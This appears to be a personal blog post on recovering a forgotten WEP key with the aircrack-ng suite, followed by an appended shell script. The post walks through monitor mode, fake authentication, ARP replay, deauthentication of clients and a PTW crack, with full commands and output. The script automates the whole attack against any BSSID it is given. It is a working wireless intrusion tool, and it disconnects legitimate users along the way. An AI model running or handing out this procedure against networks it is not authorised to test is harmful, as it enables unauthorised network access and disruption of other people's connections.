The information below is not intended to harm other people. Cracking other people's networks is illegal in most countries! The other day my sister called me because she couldn't connect to her wireless network any more. She had been playing with her network connections and broke everything. She didn't know the key for her wireless access point, and the access point couldn't be reset because it's in the attic where we couldn't reach it.
So I thought I'd give it a try and hack the access point. Here are the steps I followed. First I checked whether my laptop could see the wireless network. The network I want to crack is wifi9/7.
Let's start cracking the key with the installation of aircrack-ng
I have only one wireless card in my laptop (wlan0), so that is obviously the card I have to use. Next, I have to put the card into monitor mode:
wim@wim-ubuntu:~$ sudo airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
899 NetworkManager
906 avahi-daemon
977 avahi-daemon
1113 wpa_supplicant
2744 dhclient
Process with PID 2744 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)
mon0 is a new virtual interface on the same radio (phy0) that I will use for monitoring. If I run the previous command again, mon0 should be listed as an interface.
Leave the first console running and open a new console window to run a fake authentication attempt. The value after -a is the BSSID (the MAC address of the access point we want to crack), and the -e value is the ESSID (the network name):
wim@wim-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
19:56:24 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
19:56:24 Sending Authentication Request (Open System) [ACK]
19:56:24 Authentication successful
19:56:24 Sending Association Request [ACK]
19:56:24 Association successful :-) (AID: 1)
The association succeeded, which means the access point doesn't use MAC filtering, so I don't have to spoof my MAC address. Now everything is ready to crack the key. First, if airodump-ng is still running in your first console, close it and start it again with the options to write the captured IVs to a file (the capture used further down ended up as crackwepwifi-02.ivs).
To actually crack the key I need a lot of data. At this point I've only got 4 packets and I need around 100000 IVs, so I have to speed things up by launching aireplay-ng in ARP-request replay mode (-3) in a new console window. Every replayed ARP request makes the access point re-broadcast it, encrypted with a fresh IV:
wim@wim-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
20:07:31 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
Saving ARP requests in replay_arp-0208-200731.cap
You should also start airodump-ng to capture replies.
Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Now keep aireplay-ng and airodump-ng running and launch the deauthentication attack in another console. Kicking a connected client off the network forces it to reconnect and send ARP requests, which gives the replay attack something to work with:
wim@wim-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0
20:10:02 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
Let everything run. After a few minutes you should see ARP requests coming in, and the data count will start increasing very fast. I noticed that it went a bit faster when I tried to connect to the target network from Ubuntu, presumably because the connection attempt generates frames the replay attack can use. When enough packets have been captured, it's time to crack them. I opened a new console and used the following command, where crackwepwifi-02.ivs is the file written by the airodump-ng run above:
wim@wim-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.ivs
Opening /home/wim/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
Decrypted correctly: 100%
Got it! The key for the network is 06469. I could connect without a problem and made my sister happy again :-) That a 40-bit WEP key falls in a few minutes to a laptop with a stock wireless card is also the reason WEP should no longer be used at all: once you're back in, switch the access point to WPA2 instead of keeping the recovered key.
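The whole procedure above (monitor mode, IV capture with airodump-ng, fake authentication, ARP replay, deauth, and the aircrack-ng PTW attack) as one script. This is an added example, not the post's own commands or part of aircrack-ng: it assumes a Linux box with aircrack-ng 1.x and iw installed, runs only as root, and takes the interface, BSSID, ESSID and channel as arguments (the post's wifi9/7 values are used only in the comments). The helpers at the top parse aircrack-ng's "KEY FOUND!" line and convert the hex key to the ASCII form the tool prints, so they can be exercised without any hardware.

```shell
#!/bin/sh
# Added example (not from the original post): end-to-end WEP cracking driver
# around the aircrack-ng suite. Assumes aircrack-ng 1.x, iw, and root.

# --- pure helpers: no root, no radio needed ---------------------------------

# Extract the colon-separated hex key from an aircrack-ng "KEY FOUND!" line,
# e.g. "KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )" -> "30:36:34:36:39".
key_from_aircrack_line() {
    printf '%s\n' "$1" | sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *\].*/\1/p'
}

# Turn "30:36:34:36:39" into the ASCII key aircrack-ng reports ("06469").
# Bytes outside printable ASCII would make the hex form the only usable one.
hexkey_to_ascii() {
    out=""
    for byte in $(printf '%s' "$1" | tr ':' ' '); do
        out="$out$(printf "\\$(printf '%03o' "0x$byte")")"
    done
    printf '%s' "$out"
}

# Key length in bits from the hex form: 5 bytes = 40-bit (sold as "64-bit" WEP),
# 13 bytes = 104-bit (sold as "128-bit" WEP).
wep_key_bits() {
    n=$(printf '%s' "$1" | tr -cd ':' | wc -c | tr -d ' ')
    echo $(( (n + 1) * 8 ))
}

# Refuse anything that is not a well-formed MAC before passing it to the tools.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# The monitor interface airmon-ng created, found via iw instead of parsing
# airmon-ng's version-dependent wording ("mon0" here, "wlan0mon" on newer versions).
find_monitor_iface() {
    iw dev | awk '/^[[:space:]]*Interface/ {name=$2} /type monitor/ {print name; exit}'
}

# --- the attack itself (root, real hardware) --------------------------------

main() {
    set -eu
    iface=${1:?usage: $0 <wifi-iface> <bssid> <essid> <channel> [capture-prefix]}
    bssid=$2 essid=$3 channel=$4
    prefix=${5:-crackwep}          # airodump-ng appends -01, -02, ... and .ivs
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    for t in airmon-ng airodump-ng aireplay-ng aircrack-ng iw; do
        command -v "$t" >/dev/null || { echo "missing tool: $t" >&2; return 1; }
    done

    # Stop the processes airmon-ng warned about (NetworkManager, wpa_supplicant,
    # dhclient) and bring up a monitor interface locked to the AP's channel.
    airmon-ng check kill >/dev/null
    airmon-ng start "$iface" "$channel" >/dev/null
    mon=$(find_monitor_iface)
    [ -n "$mon" ] || { echo "no monitor interface came up" >&2; return 1; }
    ourmac=$(cat "/sys/class/net/$mon/address")
    replay=""

    # Capture only IVs from the target AP (the post's crackwepwifi-02.ivs step).
    airodump-ng -c "$channel" --bssid "$bssid" -w "$prefix" --ivs "$mon" >/dev/null 2>&1 &
    dump=$!
    trap 'kill $dump $replay 2>/dev/null; airmon-ng stop "$mon" >/dev/null' EXIT
    sleep 3

    # Fake authentication (-1) so the AP accepts our frames; failure here
    # usually means MAC filtering, which the post did not run into.
    aireplay-ng -1 0 -a "$bssid" -e "$essid" -h "$ourmac" "$mon"

    # ARP request replay (-3) makes the AP re-broadcast each ARP with a new IV...
    aireplay-ng -3 -b "$bssid" -h "$ourmac" "$mon" >/dev/null 2>&1 &
    replay=$!
    # ...and a short deauth burst (-0) makes a real client reconnect and re-ARP.
    # Add -c <client mac> to target one station, as aireplay-ng itself suggests.
    aireplay-ng -0 5 -a "$bssid" "$mon" >/dev/null

    # Retry the PTW attack as IVs accumulate; -l writes the key out on success.
    keyfile="$prefix.key"
    rm -f "$keyfile"
    while [ ! -s "$keyfile" ]; do
        sleep 30
        aircrack-ng -q -b "$bssid" -l "$keyfile" "$prefix"-*.ivs >/dev/null 2>&1 || true
    done
    echo "KEY: $(cat "$keyfile")"
}

# Only attack when arguments are given, so the helpers can be sourced safely.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Run it as `sudo ./wepcrack.sh wlan0 00:24:01:65:97:69 wifi9/7 6 crackwepwifi` to reproduce the post's setup; the loop keeps re-running aircrack-ng every 30 seconds until PTW has enough IVs, and the EXIT trap tears down the replay, the capture and the monitor interface whether the script finishes or is interrupted.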